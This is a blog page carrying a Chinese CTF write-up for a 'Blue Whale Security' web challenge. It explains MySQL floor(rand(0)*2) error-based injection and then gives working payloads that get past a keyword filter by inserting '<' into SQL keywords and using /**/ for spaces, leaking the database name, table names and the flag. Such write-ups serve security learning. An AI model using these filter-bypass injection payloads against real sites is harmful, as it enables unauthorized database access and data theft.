IT辅导娱乐网| 蜘蛛地图| 所有文章|
蓝鲸安全ctf打卡web篇----第一期 - IT辅导
  • 首页
  • IT技术 IT辅导资源网设计图
    • DVWA靶场
    • sqli-lab靶场
  • 源码基地
  • 软件分享 IT辅导资源网设计图
    • 辅助软件
  • emlog教程
  • 白嫖活动
  • 网络技巧 IT辅导资源网设计图
    • seo教程
  • 编程教程
  • 值得看一看 IT辅导资源网设计图
    • 值得听一听
    • 读懂世界
    • 活动线报
  • 更多功能 IT辅导资源网设计图
    • 在线投稿
    • 公告动态
    • 广告合作
    • 匿名投稿


登录后,享受更多优质服务哦
IT辅导资源网站长qq头像
欢迎回来,可爱的会员!个人中心退出登录
导航菜单
  • 首页
  • IT技术
    • DVWA靶场
    • sqli-lab靶场
  • 源码基地
  • 软件分享
    • 辅助软件
  • emlog教程
  • 白嫖活动
  • 网络技巧
    • seo教程
  • 编程教程
  • 值得看一看
    • 值得听一听
    • 读懂世界
    • 活动线报
  • 更多功能
    • 在线投稿
    • 公告动态
    • 广告合作
    • 匿名投稿
电脑白嫖阿里云服务器html支付宝抖音古风绝地求生00后2020最新歌曲分享电影推荐

蓝鲸安全ctf打卡web篇----第一期

2020/3/20 五年级扛把子  IT技术

一.真的注入

floor报错注入
floor 函数是一个下去整函数
rand(0) 能产生一个随机数
floor(rand(0)2) 能够产生0或1的随机值
count(
)+group by * 会对查询表格归类计数,相同值的列归一后计数加1
concat() 可将两类值合并为一列select

select count(*),concat(floor(rand(0)*2),version())x from information_schema.tables group by x;

简化下来就是

select count(*) from information_schema.tables group by concat(floor(rand(0)*2),version());

打开数据库运行代码,出现
在这里插入图片描述floor(rand(0)*2)报错是有条件的,数据库记录必须3条以上,而且在3条以上必定报错.
附几篇大佬文章:

https://mp.weixin.qq.com/s?__biz=MzA5NDY0OTQ0Mw==&mid=403404979&idx=1&sn=27d10b6da357d72304086311cefd573e&scene=1&srcid=04131X3lQlrDMYOCntCqWf6n#wechat_redirect
http://heartsky.info/2016/12/04/%E5%87%A0%E7%A7%8D%E5%B8%B8%E8%A7%81%E7%9A%84%20MySQL%20%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/
https://www.dazhuanlan.com/2019/12/09/5dee475c39bec/

会报错出rand(0)*2和版本名.
题目:
在这里插入图片描述
在这里插入图片描述

首先直接输入 ’ 发现报错,说明可能存在注入。

在这里插入图片描述
用 ’ and ‘1’='1 搜索发现页面跳转

在这里插入图片描述
在这里插入图片描述
被拦截了,相当于waf
然后测试哪些字符被拦截了。用burp跑一下,抓包设置变量
在这里插入图片描述在这里插入图片描述
发现 and,union,or,select,order这些字符被拦截了。空格也被过滤
看题目,试试xss.
测试
(的确不是xss)
在这里插入图片描述发现有些字符被过滤了,于是试试哪些字符被过滤了
输入 <>,.-#
在这里插入图片描述
发现尖括号被过滤为空
那么我们就可以用利用尖括号进行绕过。比如利用uni<on破坏检测结构,之后尖括号被过滤,union又被组合回来
在这里插入图片描述
空格被过滤,但可以用/**/代替。
输入:SQL%'/**/a<nd/**/'1'='1'#

在这里插入图片描述
输入sql%'/**/order/**/by/**/4#
在这里插入图片描述
输入sql%'/**/order/**/by/**/3#
在这里插入图片描述
说明有三个字段。
输入sql%'/**/union/**/select/**/1,2,3#
在这里插入图片描述
但没有回显,说明网页做了过滤。

之前输入单引号时报错了,所以可以用报错.
输入

sql%'/**/a<nd/**/(sel<ect/**/1/**/fr<om/**/(se<lect/**/coun<t(*),con<cat((se<lect/**/co<ncat_ws(0x5e,ver<sion(),dat<abase())),floo<r(ra<nd(0)*2))x/**/fr<om/**/info<rmation_schema.tables/**/gr<oup/**/by/**/x)a)#

因为or会被拦截所以注意information等其他单词中的or绕过。
在这里插入图片描述
报错出了版本号,和数据库,外加了一个数字1

sql%'/**/a<nd/**/(sel<ect/**/1/**/fr<om/**/(se<lect/**/coun<t(*),con<cat((se<lect/**/co<ncat_ws(0x7e,table_name,0x7e)/**/fr<om/**/info<rmation_schema.tables/**/whe<re/**/table_schema=database()/**/limit/**/0,1),floo<r(ra<nd(0)*2))x/**/fr<om/**/info<rmation_schema.tables/**/gr<oup/**/by/**/x)a)#

在这里插入图片描述
爆出表名。可以更换limit查其他表名,现在猜测flag可能藏在这个表名里,继续查列名。但是发现column和columns直接被过滤为空了,用<也不能绕过。
那么我们可以直接猜解其列名来爆出flag

sql%'/**/a<nd/**/(sel<ect/**/1/**/fr<om/**/(se<lect/**/coun<t(*),con<cat((se<lect/**/co<ncat_ws(0x7e,column_name,0x7e)/**/fr<om/**/flag_0d9a/**/limit/**/0,1),floo<r(ra<nd(0)*2))x/**/fr<om/**/info<rmation_schema.tables/**/gr<oup/**/by/**/x)a)#

burp中column_name设置为变量。
在这里插入图片描述

在这里插入图片描述发现flag列被跑出来了,flag也出来了whale{hRzfVlzK95LVaASs}

 点赞:1  打赏  分享  海报

  • 打赏支付宝扫一扫
  • 打赏微信扫一扫
  • 打赏企鹅扫一扫
结束语
温馨提醒:如有技术问题以及资源失效请联系站长 QQ89549822 进行反馈!!!
 您阅读本文耗时: 0小时02分35秒
热度:2347° 发布时间:2020年3月20日

推荐:电脑白嫖阿里云服务器html支付宝抖音古风绝地求生00后2020最新歌曲分享电影推荐

标题:蓝鲸安全ctf打卡web篇----第一期

链接: https://www.itfd.cn/post-86.html

版权:转载请注明来源于【IT辅导娱乐网】为原创

上一篇: 小白浅谈SQL注入(二)

下一篇: SQL注入笔记

作者头像 作者名称 作者性别
五年级扛把子
联系作者 作者主页

热门推荐

1 Xshell远程连接kali系统详细设置
2 端口Banner信息获取-web安全
3 史上最详细VM虚拟机中的文件共享四种方法
4 如何创建伪静态文件
5 滚动文字代码(全)
6 DOS和PHP操作数据库-cookie、session简介

评论列表

取消回复

  • 存档

    • 2020年9月(191)
    • 2020年8月(92)
    • 2020年7月(5)
    • 2020年6月(224)
    • 2020年5月(392)
    • 2020年4月(267)
    • 2020年3月(76)
    • 2019年3月(1)
    • 1970年1月(29)
  • 搜索

  • 热门文章

    • 神佑之路手游源码-附视频教程
    • 最新可用老王VPN2.22.15谷歌市场版,免费使用
    • 私藏的十个网站,不看后悔系列
    • 虚拟商品自动发货商城源码
    • 不吃苦、不奋斗,你要青春做什么?
  • 随机文章

      • 歌曲分享:秋天不回来
        • 歌曲分享:NUMB
          • 2020年网站不收录的解决方法
            • 爱客CMS米酷优化版免授权带伪静态规则
              • 解决DVWA中reCAPTCHA API key missing from config file问题
    提示信息

    SQL语句执行错误: SELECT COUNT(*) AS total FROM emlog_twitter
    Table 'itfd.emlog_twitter' doesn't exist

    «点击返回